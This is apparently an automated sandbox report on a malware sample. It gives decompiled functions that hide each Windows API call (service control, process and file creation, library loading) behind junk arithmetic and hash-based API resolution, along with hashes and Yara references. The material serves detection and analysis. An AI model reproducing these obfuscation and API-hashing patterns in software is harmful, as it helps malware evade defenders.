                                          Function 007A5FB2, Relevance: 1.5, APIs: 1, Instructions: 33serviceCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 70%
                                          			E007A5FB2(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t21;
				int _t27;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E007A602B(_t21);
				_v12 = 0x33d;
				_v12 = _v12 + 0xc3dc;
				_v12 = _v12 | 0x39ccfb02;
				_v12 = _v12 ^ 0x39ccf342;
				_v8 = 0xe8d9;
				_v8 = _v8 * 0x16;
				_v8 = _v8 | 0x4145347f;
				_v8 = _v8 ^ 0x9035ef96;
				_v8 = _v8 ^ 0xd1609914;
				E007B07A9(0x6b3db31e, 0x2c3ac9a2, __ecx, __ecx, 0x1d5);
				_t27 = CloseServiceHandle(_a4); // executed
				return _t27;
			}







                                          0x007a5fb5
                                          0x007a5fb6
                                          0x007a5fb7
                                          0x007a5fbb
                                          0x007a5fbc
                                          0x007a5fc1
                                          0x007a5fcb
                                          0x007a5fd7
                                          0x007a5fde
                                          0x007a5fe5
                                          0x007a5ffc
                                          0x007a5fff
                                          0x007a6006
                                          0x007a600d
                                          0x007a601a
                                          0x007a6025
                                          0x007a602a

                                          APIs
                                          • CloseServiceHandle.ADVAPI32(39CCF342), ref: 007A6025
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2098980384.00000000007A1000.00000020.00000001.sdmp, Offset: 007A0000, based on PE: true
                                          • Associated: 00000009.00000002.2098970238.00000000007A0000.00000004.00000001.sdmp Download File
                                          • Associated: 00000009.00000002.2099057824.00000000007BC000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: CloseHandleService
                                          • String ID:
                                          • API String ID: 1725840886-0
                                          • Opcode ID: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
                                          • Instruction ID: 64d33009b4a6430d23e7d4eee3dc2b1d6e098b9757e5ff21b8ad14c5562a8e73
                                          • Opcode Fuzzy Hash: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
                                          • Instruction Fuzzy Hash: 35F04FB0C11208FFDB08DFA0E94689EBFB9EB40300F208198E509A7260E7755F559F54
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Non-executed Functions

                                          Analysis Process: rundll32.exe PID: 960 Parent PID: 2884 rundll32.exeCOMMON

                                          Executed Functions

                                          Function 00252959, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 62%
                                          			E00252959(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, int _a16) {
				unsigned int _v8;
				signed int _v12;
				void* _t30;
				void* _t39;
				signed int _t41;
				signed int _t42;

				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(0);
				_push(0);
				E0025602B(_t30);
				_v12 = 0x5e3c;
				_t41 = 0x63;
				_v12 = _v12 / _t41;
				_t42 = 0x2f;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x000064be;
				_v8 = 0x74da;
				_v8 = _v8 | 0xfefeeaea;
				_v8 = _v8 >> 0xc;
				_v8 = _v8 ^ 0x000fb531;
				E002607A9(0x44082a3f, 0x2c3ac9a2, _t42, _t42, 0x18a);
				_t39 = OpenSCManagerW(0, 0, _a16); // executed
				return _t39;
			}









                                          0x0025295f
                                          0x00252964
                                          0x00252967
                                          0x0025296a
                                          0x0025296d
                                          0x0025296e
                                          0x0025296f
                                          0x00252977
                                          0x00252985
                                          0x0025298a
                                          0x00252992
                                          0x0025299a
                                          0x002529a2
                                          0x002529a9
                                          0x002529b0
                                          0x002529b7
                                          0x002529bb
                                          0x002529cf
                                          0x002529dc
                                          0x002529e2

                                          APIs
                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,?), ref: 002529DC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.2099552528.0000000000251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                          • Associated: 0000000A.00000002.2099542294.0000000000250000.00000004.00000001.sdmp Download File
                                          • Associated: 0000000A.00000002.2099594218.000000000026C000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: ManagerOpen
                                          • String ID: <^
                                          • API String ID: 1889721586-3203995635
                                          • Opcode ID: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
                                          • Instruction ID: 33dfa3c1d35cc9879a733454cfbeac04152e2f4093096828af0e7f85c150b977
                                          • Opcode Fuzzy Hash: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
                                          • Instruction Fuzzy Hash: FC016D72A00108BFEB14DF95DC4A8DFBFB6EF44310F108088F508A6250D7B69F619B91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0025C6C7, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 48COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 58%
                                          			E0025C6C7(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t29;
				intOrPtr* _t33;
				void* _t34;

				E0025602B(_t29);
				_v28 = 0x4fe02f;
				_v24 = 0x232390;
				_v20 = 0xf8460;
				_v16 = 0;
				_v12 = 0xf625;
				_v12 = _v12 >> 6;
				_v12 = _v12 >> 0xa;
				_v12 = _v12 + 0xffffcc6f;
				_v12 = _v12 ^ 0xffffa5b6;
				_v8 = 0xe5cd;
				_v8 = _v8 + 0xffffae4d;
				_v8 = _v8 | 0xf8bbefe7;
				_v8 = _v8 ^ 0xf8bbcc9a;
				_t33 = E002607A9(0x59a47438, 0xd39e34db, __ecx, __ecx, 0x1e9);
				_t34 =  *_t33(0, _a16, 0, 0, _a4, __ecx, __edx, _a4, 0, _a12, _a16, _a20, 0, 0); // executed
				return _t34;
			}












                                          0x0025c6e1
                                          0x0025c6e6
                                          0x0025c6f0
                                          0x0025c6fc
                                          0x0025c703
                                          0x0025c706
                                          0x0025c70d
                                          0x0025c711
                                          0x0025c715
                                          0x0025c71c
                                          0x0025c723
                                          0x0025c72a
                                          0x0025c731
                                          0x0025c738
                                          0x0025c751
                                          0x0025c762
                                          0x0025c768

                                          APIs
                                          • SHGetFolderPathW.SHELL32(00000000,00232390,00000000,00000000,FFFFA5B6), ref: 0025C762
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.2099552528.0000000000251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                          • Associated: 0000000A.00000002.2099542294.0000000000250000.00000004.00000001.sdmp Download File
                                          • Associated: 0000000A.00000002.2099594218.000000000026C000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: FolderPath
                                          • String ID: /O
                                          • API String ID: 1514166925-1923427199
                                          • Opcode ID: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
                                          • Instruction ID: baafa9778dc446369fdbbf24d4533c3815a7610ac10221fdb0ab2357abce437a
                                          • Opcode Fuzzy Hash: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
                                          • Instruction Fuzzy Hash: 611133B290122DBBCB25DF95DC498EFBFB8EF04714F108188F90962210D3714B659BE0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00251000, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42libraryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 82%
                                          			E00251000(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _t33;
				struct HINSTANCE__* _t40;
				signed int _t42;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E0025602B(_t33);
				_v16 = _v16 & 0x00000000;
				_v24 = 0x1b2eda;
				_v20 = 0x33a3b7;
				_v12 = 0x98c;
				_v12 = _v12 + 0xb426;
				_v12 = _v12 + 0x5beb;
				_t42 = 0x63;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x00000fce;
				_v8 = 0x120e;
				_v8 = _v8 + 0xfffffcb8;
				_v8 = _v8 + 0xffffefaa;
				_v8 = _v8 >> 5;
				_v8 = _v8 ^ 0x07ff9a02;
				E002607A9(0xa900db79, 0x9164b7cc, _t42, _t42, 0xdd);
				_t40 = LoadLibraryW(_a12); // executed
				return _t40;
			}











                                          0x00251006
                                          0x00251009
                                          0x0025100c
                                          0x00251011
                                          0x00251016
                                          0x0025101d
                                          0x00251026
                                          0x0025102d
                                          0x00251034
                                          0x0025103b
                                          0x00251047
                                          0x0025104f
                                          0x00251057
                                          0x0025105e
                                          0x00251065
                                          0x0025106c
                                          0x00251073
                                          0x00251077
                                          0x0025108b
                                          0x00251096
                                          0x0025109b

                                          APIs
                                          • LoadLibraryW.KERNEL32(0033A3B7), ref: 00251096
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.2099552528.0000000000251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                          • Associated: 0000000A.00000002.2099542294.0000000000250000.00000004.00000001.sdmp Download File
                                          • Associated: 0000000A.00000002.2099594218.000000000026C000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: LibraryLoad
                                          • String ID: [
                                          • API String ID: 1029625771-3431493590
                                          • Opcode ID: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
                                          • Instruction ID: fdf4071e261dd71de8bb037cab8b5bf1dfdc30cb7bde443b759affbe5f02278a
                                          • Opcode Fuzzy Hash: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
                                          • Instruction Fuzzy Hash: 2C015BB6D01308BBDF04DF94C94A5DEBBB1EB54318F108188E41466291D3B19B689B91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00254859, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 28COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E00254859() {
				signed int _v8;
				signed int _v12;
				void* _t22;

				_v12 = 0xafe2;
				_v12 = _v12 * 0x42;
				_v12 = _v12 + 0xffffdd89;
				_v12 = _v12 ^ 0x002d198d;
				_v8 = 0x5b09;
				_v8 = _v8 | 0xa1ea9544;
				_v8 = _v8 * 0x12;
				_v8 = _v8 ^ 0x6283d9c1;
				E002607A9(0xc44181ea, 0x9164b7cc, _t22, _t22, 0x1a5);
				ExitProcess(0);
			}






                                          0x0025485e
                                          0x0025487a
                                          0x0025487d
                                          0x00254884
                                          0x0025488b
                                          0x00254892
                                          0x0025489d
                                          0x002548a0
                                          0x002548ad
                                          0x002548b7

                                          APIs
                                          • ExitProcess.KERNELBASE(00000000), ref: 002548B7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.2099552528.0000000000251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                          • Associated: 0000000A.00000002.2099542294.0000000000250000.00000004.00000001.sdmp Download File
                                          • Associated: 0000000A.00000002.2099594218.000000000026C000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: ExitProcess
                                          • String ID: [
                                          • API String ID: 621844428-1822564810
                                          • Opcode ID: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
                                          • Instruction ID: cd5c2410cb2683136d7d70b5a3a887321da5486bcd2c2a1e36389db571b024c3
                                          • Opcode Fuzzy Hash: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
                                          • Instruction Fuzzy Hash: 26F017B0A15209FBDB04CFE8CA9699EBFB9EB40301F20818CE444B7290E3B15F509B50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00264F7D, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 32COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 66%
                                          			E00264F7D(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t17;
				int _t24;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E0025602B(_t17);
				_v12 = 0xddd8;
				_v12 = _v12 * 0x48;
				_v12 = _v12 ^ 0x003e66d8;
				_v8 = 0xcb35;
				_v8 = _v8 ^ 0x7b88573c;
				_v8 = _v8 * 0x59;
				_v8 = _v8 ^ 0xf27e4a21;
				E002607A9(0x6d6c237b, 0x9164b7cc, __ecx, __ecx, 0xce);
				_t24 = CloseHandle(_a4); // executed
				return _t24;
			}







                                          0x00264f80
                                          0x00264f81
                                          0x00264f82
                                          0x00264f86
                                          0x00264f87
                                          0x00264f8c
                                          0x00264fa5
                                          0x00264fa8
                                          0x00264faf
                                          0x00264fb6
                                          0x00264fc7
                                          0x00264fca
                                          0x00264fd7
                                          0x00264fe2
                                          0x00264fe7

                                          APIs
                                          • CloseHandle.KERNELBASE(003E66D8), ref: 00264FE2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.2099552528.0000000000251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                          • Associated: 0000000A.00000002.2099542294.0000000000250000.00000004.00000001.sdmp Download File
                                          • Associated: 0000000A.00000002.2099594218.000000000026C000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: CloseHandle
                                          • String ID: {#lm
                                          • API String ID: 2962429428-1564096886
                                          • Opcode ID: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
                                          • Instruction ID: 25c7f53960982c4511406ae7b859bcf28ff628bb3fc7f76f008355ad4f77eeea
                                          • Opcode Fuzzy Hash: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
                                          • Instruction Fuzzy Hash: 54F037B081120CFFDB04EFA4D98689EBFBAEB40300F208199E804AB250D3715B54AB54
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0026976F, Relevance: 1.6, APIs: 1, Instructions: 63processCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 21%
                                          			E0026976F(void* __ecx, struct _PROCESS_INFORMATION* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, struct _STARTUPINFOW* _a20, int _a24, intOrPtr _a28, intOrPtr _a40, intOrPtr _a44, intOrPtr _a52, intOrPtr _a56, WCHAR* _a60, WCHAR* _a68) {
				unsigned int _v8;
				signed int _v12;
				void* _t34;
				int _t39;
				struct _PROCESS_INFORMATION* _t48;

				_push(__ecx);
				_push(__ecx);
				_t48 = __edx;
				_push(0);
				_push(_a68);
				_push(0);
				_push(_a60);
				_push(_a56);
				_push(_a52);
				_push(0);
				_push(_a44);
				_push(_a40);
				_push(0);
				_push(0);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0025602B(_t34);
				_v12 = 0xaff9;
				_v12 = _v12 | 0xcee54bd1;
				_v12 = _v12 + 0x6ed6;
				_v12 = _v12 ^ 0xcee61221;
				_v8 = 0x6229;
				_v8 = _v8 ^ 0x42aa9f31;
				_v8 = _v8 >> 2;
				_v8 = _v8 ^ 0x10aad83f;
				E002607A9(0xf0de9e9f, 0x9164b7cc, __ecx, __ecx, 0x155);
				_t39 = CreateProcessW(_a68, _a60, 0, 0, _a24, 0, 0, 0, _a20, _t48); // executed
				return _t39;
			}








                                          0x00269772
                                          0x00269773
                                          0x00269778
                                          0x0026977a
                                          0x0026977b
                                          0x0026977e
                                          0x0026977f
                                          0x00269782
                                          0x00269785
                                          0x00269788
                                          0x00269789
                                          0x0026978c
                                          0x0026978f
                                          0x00269790
                                          0x00269791
                                          0x00269794
                                          0x00269797
                                          0x0026979a
                                          0x0026979d
                                          0x002697a0
                                          0x002697a3
                                          0x002697a6
                                          0x002697a7
                                          0x002697a8
                                          0x002697ad
                                          0x002697b7
                                          0x002697c3
                                          0x002697ca
                                          0x002697d1
                                          0x002697d8
                                          0x002697df
                                          0x002697e3
                                          0x002697fc
                                          0x00269816
                                          0x0026981d

                                          APIs
                                          • CreateProcessW.KERNEL32(0025591A,?,00000000,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,0025591A), ref: 00269816
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.2099552528.0000000000251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                          • Associated: 0000000A.00000002.2099542294.0000000000250000.00000004.00000001.sdmp Download File
                                          • Associated: 0000000A.00000002.2099594218.000000000026C000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: CreateProcess
                                          • String ID:
                                          • API String ID: 963392458-0
                                          • Opcode ID: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
                                          • Instruction ID: 6edb69648b3f94e7e03f1beca71628678257b7b9f364a73f49670ed32773ee0c
                                          • Opcode Fuzzy Hash: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
                                          • Instruction Fuzzy Hash: 8D11B372911148BBDF1A9F96DC0ACDF7F7AEF89750F104148FA1556120D2728A60EBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0025B566, Relevance: 1.6, APIs: 1, Instructions: 55fileCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 31%
                                          			E0025B566(void* __ecx, long __edx, intOrPtr _a4, intOrPtr _a8, long _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a28, long _a32, intOrPtr _a36, intOrPtr _a40, long _a44, WCHAR* _a48) {
				unsigned int _v8;
				signed int _v12;
				void* _t32;
				void* _t38;
				long _t47;

				_push(__ecx);
				_push(__ecx);
				_push(_a48);
				_t47 = __edx;
				_push(_a44);
				_push(_a40);
				_push(_a36);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(0);
				E0025602B(_t32);
				_v8 = 0xfd14;
				_v8 = _v8 >> 4;
				_v8 = _v8 * 0x7a;
				_v8 = _v8 >> 9;
				_v8 = _v8 ^ 0x00002bef;
				_v12 = 0x4f26;
				_v12 = _v12 | 0xe7e97f76;
				_v12 = _v12 ^ 0xe7e94dbb;
				E002607A9(0xfbdf2264, 0x9164b7cc, __ecx, __ecx, 0x1bd);
				_t38 = CreateFileW(_a48, _a12, _t47, 0, _a44, _a32, 0); // executed
				return _t38;
			}








                                          0x0025b569
                                          0x0025b56a
                                          0x0025b56d
                                          0x0025b572
                                          0x0025b574
                                          0x0025b577
                                          0x0025b57a
                                          0x0025b57d
                                          0x0025b580
                                          0x0025b583
                                          0x0025b586
                                          0x0025b587
                                          0x0025b58a
                                          0x0025b58d
                                          0x0025b590
                                          0x0025b593
                                          0x0025b594
                                          0x0025b595
                                          0x0025b59a
                                          0x0025b5a4
                                          0x0025b5b8
                                          0x0025b5c0
                                          0x0025b5c4
                                          0x0025b5cb
                                          0x0025b5d2
                                          0x0025b5d9
                                          0x0025b5e6
                                          0x0025b5fd
                                          0x0025b604

                                          APIs
                                          • CreateFileW.KERNELBASE(00260668,?,?,00000000,?,?,00000000,?,?,?,047BBE06,00260668,?,?,?,?), ref: 0025B5FD
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.2099552528.0000000000251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                          • Associated: 0000000A.00000002.2099542294.0000000000250000.00000004.00000001.sdmp Download File
                                          • Associated: 0000000A.00000002.2099594218.000000000026C000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID:
                                          • API String ID: 823142352-0
                                          • Opcode ID: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
                                          • Instruction ID: d3f7f741c048d2d48f6a860bb896841affe694d53228fd13fcd338edbbf0ba2c
                                          • Opcode Fuzzy Hash: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
                                          • Instruction Fuzzy Hash: 6911B272801248BBDF16DF95DD06CEE7F7AFF89314F148198FA1862160D3729A60EB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0026981E, Relevance: 1.5, APIs: 1, Instructions: 43memoryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 54%
                                          			E0026981E(long __ecx, void* __edx, long _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				void* _t22;
				void* _t28;
				void* _t34;
				long _t37;

				_push(__ecx);
				_push(__ecx);
				_push(_a16);
				_t34 = __edx;
				_t37 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0025602B(_t22);
				_v12 = 0xe68;
				_v12 = _v12 * 0x39;
				_v12 = _v12 ^ 0xd1b1d871;
				_v12 = _v12 ^ 0xd1b2fb7e;
				_v8 = 0x629e;
				_v8 = _v8 + 0xfffff5da;
				_v8 = _v8 | 0xbef7b77b;
				_v8 = _v8 ^ 0xbef79fc3;
				E002607A9(0xd2423672, 0x9164b7cc, __ecx, __ecx, 0x1ff);
				_t28 = RtlAllocateHeap(_t34, _a4, _t37); // executed
				return _t28;
			}









                                          0x00269821
                                          0x00269822
                                          0x00269825
                                          0x00269828
                                          0x0026982a
                                          0x0026982c
                                          0x0026982f
                                          0x00269832
                                          0x00269835
                                          0x00269836
                                          0x00269837
                                          0x0026983c
                                          0x00269855
                                          0x00269858
                                          0x0026985f
                                          0x00269866
                                          0x0026986d
                                          0x00269874
                                          0x0026987b
                                          0x0026988e
                                          0x0026989b
                                          0x002698a2

                                          APIs
                                          • RtlAllocateHeap.NTDLL(00000000,D1B2FB7E,00000001,?,?,?,002587F2,0000CAAE,0000510C,AD82F196), ref: 0026989B
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.2099552528.0000000000251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                          • Associated: 0000000A.00000002.2099542294.0000000000250000.00000004.00000001.sdmp Download File
                                          • Associated: 0000000A.00000002.2099594218.000000000026C000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID:
                                          • API String ID: 1279760036-0
                                          • Opcode ID: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
                                          • Instruction ID: 1cc55234befb484f790854e356106a939cd27aa4cb83e754257353b9b2be817a
                                          • Opcode Fuzzy Hash: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
                                          • Instruction Fuzzy Hash: A5019A72801208FBDB04EFD5DC46CDFBF79EF85310F108188F908A6220E6729B619BA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00267BF4, Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 62%
                                          			E00267BF4(struct _SHFILEOPSTRUCTW* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				void* _t24;
				int _t31;
				signed int _t33;
				struct _SHFILEOPSTRUCTW* _t40;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_t40 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0025602B(_t24);
				_v8 = 0xa117;
				_t33 = 0x76;
				_v8 = _v8 / _t33;
				_v8 = _v8 >> 4;
				_v8 = _v8 ^ 0x210fe703;
				_v8 = _v8 ^ 0x210fdcea;
				_v12 = 0xf1e9;
				_v12 = _v12 << 9;
				_v12 = _v12 ^ 0x01e3a445;
				E002607A9(0x6b98377a, 0xd39e34db, _t33, _t33, 0x219);
				_t31 = SHFileOperationW(_t40); // executed
				return _t31;
			}









                                          0x00267bf7
                                          0x00267bf8
                                          0x00267bfa
                                          0x00267bfd
                                          0x00267bff
                                          0x00267c02
                                          0x00267c06
                                          0x00267c07
                                          0x00267c0f
                                          0x00267c1d
                                          0x00267c25
                                          0x00267c2d
                                          0x00267c31
                                          0x00267c38
                                          0x00267c3f
                                          0x00267c46
                                          0x00267c4a
                                          0x00267c5e
                                          0x00267c67
                                          0x00267c6d

                                          APIs
                                          • SHFileOperationW.SHELL32(68CF93E9,?,?,?,?,?,?), ref: 00267C67
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.2099552528.0000000000251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                          • Associated: 0000000A.00000002.2099542294.0000000000250000.00000004.00000001.sdmp Download File
                                          • Associated: 0000000A.00000002.2099594218.000000000026C000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: FileOperation
                                          • String ID:
                                          • API String ID: 3080627654-0
                                          • Opcode ID: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
                                          • Instruction ID: 798c8b6fb1566ed6b37e1f062d61cd82022f54404098e72b2d6c61ce261cee56
                                          • Opcode Fuzzy Hash: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
                                          • Instruction Fuzzy Hash: D3014FB190120CFFEB09DF94C84A8DEBBB5EF44314F108198F40567240E6B15F609B91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0025F65F, Relevance: 1.5, APIs: 1, Instructions: 40serviceCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 52%
                                          			E0025F65F(int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, short* _a12, void* _a16, intOrPtr _a20) {
				unsigned int _v8;
				signed int _v12;
				void* _t24;
				void* _t29;
				int _t35;

				_push(__ecx);
				_push(__ecx);
				_push(_a20);
				_t35 = __ecx;
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0025602B(_t24);
				_v12 = 0xd5a7;
				_v12 = _v12 ^ 0x994cba9d;
				_v12 = _v12 ^ 0x994c19d3;
				_v8 = 0xac88;
				_v8 = _v8 << 3;
				_v8 = _v8 >> 8;
				_v8 = _v8 + 0xebed;
				_v8 = _v8 ^ 0x0000ab82;
				E002607A9(0x1b506617, 0x2c3ac9a2, __ecx, __ecx, 0x18c);
				_t29 = OpenServiceW(_a16, _a12, _t35); // executed
				return _t29;
			}








                                          0x0025f662
                                          0x0025f663
                                          0x0025f665
                                          0x0025f668
                                          0x0025f66a
                                          0x0025f66d
                                          0x0025f670
                                          0x0025f673
                                          0x0025f677
                                          0x0025f678
                                          0x0025f67d
                                          0x0025f687
                                          0x0025f693
                                          0x0025f69a
                                          0x0025f6a1
                                          0x0025f6a5
                                          0x0025f6a9
                                          0x0025f6b0
                                          0x0025f6c9
                                          0x0025f6d8
                                          0x0025f6de

                                          APIs
                                          • OpenServiceW.ADVAPI32(BB1E804F,0000AB81,A536EF12), ref: 0025F6D8
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.2099552528.0000000000251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                          • Associated: 0000000A.00000002.2099542294.0000000000250000.00000004.00000001.sdmp Download File
                                          • Associated: 0000000A.00000002.2099594218.000000000026C000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: OpenService
                                          • String ID:
                                          • API String ID: 3098006287-0
                                          • Opcode ID: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
                                          • Instruction ID: 59fc6015fb4b90e20d2feef3227640ce251512d2d5e18bf623402f88a6f0aace
                                          • Opcode Fuzzy Hash: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
                                          • Instruction Fuzzy Hash: 4D01E5B6901208BBEF05AF94DC4A8DF7F75EB05324F148188F90462250D6B25E61EBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0025B6DD, Relevance: 1.5, APIs: 1, Instructions: 38COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 58%
                                          			E0025B6DD(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				void* _t23;
				intOrPtr* _t27;
				void* _t28;

				E0025602B(_t23);
				_v12 = 0x9431;
				_v12 = _v12 >> 7;
				_v12 = _v12 ^ 0x0000160f;
				_v8 = 0xc972;
				_v8 = _v8 ^ 0x829e0126;
				_v8 = _v8 + 0x4512;
				_v8 = _v8 + 0xffff18f9;
				_v8 = _v8 ^ 0x829e24c1;
				_t27 = E002607A9(0x6460e96, 0x9164b7cc, __ecx, __ecx, 0x114);
				_t28 =  *_t27(_a8, 0, _a16, 0x28, 0, __edx, 0x28, _a8, _a12, _a16, _a20, __ecx, __ecx); // executed
				return _t28;
			}








                                          0x0025b6f3
                                          0x0025b6f8
                                          0x0025b702
                                          0x0025b70b
                                          0x0025b712
                                          0x0025b719
                                          0x0025b720
                                          0x0025b727
                                          0x0025b72e
                                          0x0025b747
                                          0x0025b759
                                          0x0025b75e

                                          APIs
                                          • SetFileInformationByHandle.KERNELBASE(?,00000000,?,00000028), ref: 0025B759
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.2099552528.0000000000251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                          • Associated: 0000000A.00000002.2099542294.0000000000250000.00000004.00000001.sdmp Download File
